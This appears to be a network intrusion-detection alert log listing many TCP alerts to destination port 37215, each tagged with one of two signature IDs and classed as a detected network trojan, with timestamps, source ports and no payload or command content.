                  Timestamp:07/10/24-08:27:30.527827
                  SID:2829579
                  Source Port:47480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.756816
                  SID:2835222
                  Source Port:35396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.835787
                  SID:2829579
                  Source Port:43920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519002
                  SID:2835222
                  Source Port:38266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.901857
                  SID:2835222
                  Source Port:33966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929262
                  SID:2829579
                  Source Port:38912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.439109
                  SID:2829579
                  Source Port:33032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2829579
                  Source Port:44328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999668
                  SID:2835222
                  Source Port:48038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.628977
                  SID:2835222
                  Source Port:39396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.362026
                  SID:2835222
                  Source Port:42694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243765
                  SID:2829579
                  Source Port:48786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.447886
                  SID:2829579
                  Source Port:37054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.565091
                  SID:2829579
                  Source Port:43658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322361
                  SID:2835222
                  Source Port:56486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.829856
                  SID:2829579
                  Source Port:60172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.861604
                  SID:2829579
                  Source Port:41644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.203843
                  SID:2835222
                  Source Port:46158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142531
                  SID:2829579
                  Source Port:57390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487883
                  SID:2829579
                  Source Port:53944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.489604
                  SID:2835222
                  Source Port:49068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156197
                  SID:2835222
                  Source Port:56846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.918305
                  SID:2835222
                  Source Port:41996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2835222
                  Source Port:36496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.451295
                  SID:2829579
                  Source Port:54832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.921324
                  SID:2835222
                  Source Port:45114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2829579
                  Source Port:43032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2829579
                  Source Port:35108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.835787
                  SID:2835222
                  Source Port:49888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.852238
                  SID:2829579
                  Source Port:34030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641903
                  SID:2835222
                  Source Port:47484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.296464
                  SID:2829579
                  Source Port:50250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.528508
                  SID:2835222
                  Source Port:50058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879424
                  SID:2829579
                  Source Port:44092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.009589
                  SID:2835222
                  Source Port:33488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.226106
                  SID:2829579
                  Source Port:49494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.411856
                  SID:2829579
                  Source Port:54818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.971781
                  SID:2829579
                  Source Port:36540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.252438
                  SID:2835222
                  Source Port:47734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.648834
                  SID:2829579
                  Source Port:48916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022282
                  SID:2829579
                  Source Port:58630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.869680
                  SID:2835222
                  Source Port:52572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2829579
                  Source Port:38602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423823
                  SID:2829579
                  Source Port:45198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.756681
                  SID:2835222
                  Source Port:56976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216142
                  SID:2829579
                  Source Port:49662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.256885
                  SID:2829579
                  Source Port:59702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.616347
                  SID:2835222
                  Source Port:33736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.893689
                  SID:2835222
                  Source Port:44316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.974355
                  SID:2829579
                  Source Port:45748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.898852
                  SID:2829579
                  Source Port:33362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343381
                  SID:2835222
                  Source Port:53358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.890908
                  SID:2829579
                  Source Port:46720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355278
                  SID:2835222
                  Source Port:44328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.013540
                  SID:2835222
                  Source Port:51132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847892
                  SID:2829579
                  Source Port:39122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328619
                  SID:2829579
                  Source Port:60720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.513977
                  SID:2835222
                  Source Port:43492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.407360
                  SID:2829579
                  Source Port:38494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630697
                  SID:2829579
                  Source Port:58332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633588
                  SID:2829579
                  Source Port:47420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.094714
                  SID:2835222
                  Source Port:50344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.664680
                  SID:2829579
                  Source Port:36408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.220771
                  SID:2835222
                  Source Port:60028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.865409
                  SID:2835222
                  Source Port:57130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.226208
                  SID:2829579
                  Source Port:37938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.348022
                  SID:2829579
                  Source Port:52558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840826
                  SID:2835222
                  Source Port:45436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.149844
                  SID:2835222
                  Source Port:42728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2829579
                  Source Port:43858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.586021
                  SID:2835222
                  Source Port:48394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.511682
                  SID:2829579
                  Source Port:47844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.605487
                  SID:2835222
                  Source Port:40812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224175
                  SID:2829579
                  Source Port:35302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.459797
                  SID:2835222
                  Source Port:42632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879798
                  SID:2835222
                  Source Port:33482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.881648
                  SID:2835222
                  Source Port:60956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081950
                  SID:2829579
                  Source Port:53540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.092607
                  SID:2829579
                  Source Port:53536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.918908
                  SID:2835222
                  Source Port:40230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:29.338257
                  SID:2835222
                  Source Port:58380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849437
                  SID:2835222
                  Source Port:39414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605910
                  SID:2829579
                  Source Port:53788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2835222
                  Source Port:33152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.351373
                  SID:2829579
                  Source Port:35654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.079794
                  SID:2835222
                  Source Port:33468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.963816
                  SID:2829579
                  Source Port:41358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.471536
                  SID:2829579
                  Source Port:33598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.015024
                  SID:2835222
                  Source Port:53818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.269979
                  SID:2829579
                  Source Port:48632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.542796
                  SID:2829579
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.761557
                  SID:2835222
                  Source Port:60132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.829086
                  SID:2835222
                  Source Port:59358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.911929
                  SID:2835222
                  Source Port:53540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.870602
                  SID:2829579
                  Source Port:52574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867032
                  SID:2829579
                  Source Port:56684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.646157
                  SID:2829579
                  Source Port:60540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.290610
                  SID:2835222
                  Source Port:46396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.239494
                  SID:2835222
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.652052
                  SID:2829579
                  Source Port:36804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356986
                  SID:2835222
                  Source Port:51976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798195
                  SID:2829579
                  Source Port:57852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.931040
                  SID:2835222
                  Source Port:47236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848690
                  SID:2829579
                  Source Port:34918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.422877
                  SID:2829579
                  Source Port:33762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.526840
                  SID:2829579
                  Source Port:42410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.886736
                  SID:2829579
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.409560
                  SID:2835222
                  Source Port:51204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659396
                  SID:2829579
                  Source Port:35168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.063157
                  SID:2835222
                  Source Port:43026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2835222
                  Source Port:42058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151172
                  SID:2829579
                  Source Port:39802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.315089
                  SID:2835222
                  Source Port:34316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.938388
                  SID:2829579
                  Source Port:33972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.157015
                  SID:2835222
                  Source Port:36746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652707
                  SID:2835222
                  Source Port:42568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2829579
                  Source Port:38162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.977677
                  SID:2829579
                  Source Port:48662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.879483
                  SID:2835222
                  Source Port:54418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2829579
                  Source Port:56388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985510
                  SID:2835222
                  Source Port:59068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122449
                  SID:2829579
                  Source Port:45422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.806375
                  SID:2829579
                  Source Port:44676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.436206
                  SID:2829579
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.863856
                  SID:2835222
                  Source Port:50214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.731752
                  SID:2829579
                  Source Port:48320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624233
                  SID:2829579
                  Source Port:55298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.663912
                  SID:2829579
                  Source Port:51038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.590326
                  SID:2829579
                  Source Port:38852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.547817
                  SID:2835222
                  Source Port:37616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634002
                  SID:2829579
                  Source Port:42032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.376968
                  SID:2835222
                  Source Port:59324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.792966
                  SID:2835222
                  Source Port:57478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.545437
                  SID:2829579
                  Source Port:38616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.803034
                  SID:2835222
                  Source Port:35918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.625074
                  SID:2829579
                  Source Port:49138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.228280
                  SID:2835222
                  Source Port:37524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.887861
                  SID:2835222
                  Source Port:53396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.844638
                  SID:2829579
                  Source Port:36204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.029252
                  SID:2835222
                  Source Port:33950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.591326
                  SID:2829579
                  Source Port:47926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.848645
                  SID:2829579
                  Source Port:35262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.526388
                  SID:2835222
                  Source Port:56490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.901812
                  SID:2829579
                  Source Port:46612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.310964
                  SID:2835222
                  Source Port:54374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.759956
                  SID:2829579
                  Source Port:53176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234133
                  SID:2829579
                  Source Port:60546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.542154
                  SID:2829579
                  Source Port:41180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.360287
                  SID:2835222
                  Source Port:47300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.862299
                  SID:2829579
                  Source Port:54312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.646644
                  SID:2835222
                  Source Port:49566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.426882
                  SID:2829579
                  Source Port:39846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.859718
                  SID:2835222
                  Source Port:40336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.399018
                  SID:2829579
                  Source Port:48386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.528583
                  SID:2829579
                  Source Port:47864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.550512
                  SID:2835222
                  Source Port:40106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.385136
                  SID:2829579
                  Source Port:49424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.088837
                  SID:2835222
                  Source Port:41110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522547
                  SID:2829579
                  Source Port:50244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.686169
                  SID:2835222
                  Source Port:45436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793523
                  SID:2829579
                  Source Port:54742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.129630
                  SID:2835222
                  Source Port:42490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.123925
                  SID:2835222
                  Source Port:49010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.782105
                  SID:2829579
                  Source Port:50196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.019340
                  SID:2829579
                  Source Port:45718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.868751
                  SID:2829579
                  Source Port:50570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.623346
                  SID:2835222
                  Source Port:59990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.932186
                  SID:2835222
                  Source Port:47702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657452
                  SID:2835222
                  Source Port:48984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.813637
                  SID:2835222
                  Source Port:45742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.915046
                  SID:2829579
                  Source Port:51100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932018
                  SID:2835222
                  Source Port:52104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.819008
                  SID:2829579
                  Source Port:47222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.358336
                  SID:2829579
                  Source Port:34842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.454232
                  SID:2829579
                  Source Port:48704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156684
                  SID:2835222
                  Source Port:35144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.859417
                  SID:2829579
                  Source Port:47628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281440
                  SID:2835222
                  Source Port:34458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2829579
                  Source Port:49406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.335477
                  SID:2829579
                  Source Port:43562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.683410
                  SID:2835222
                  Source Port:56358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868387
                  SID:2835222
                  Source Port:51486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.458170
                  SID:2829579
                  Source Port:51328
                  Destination Port:37215
                  Protocol:TCP
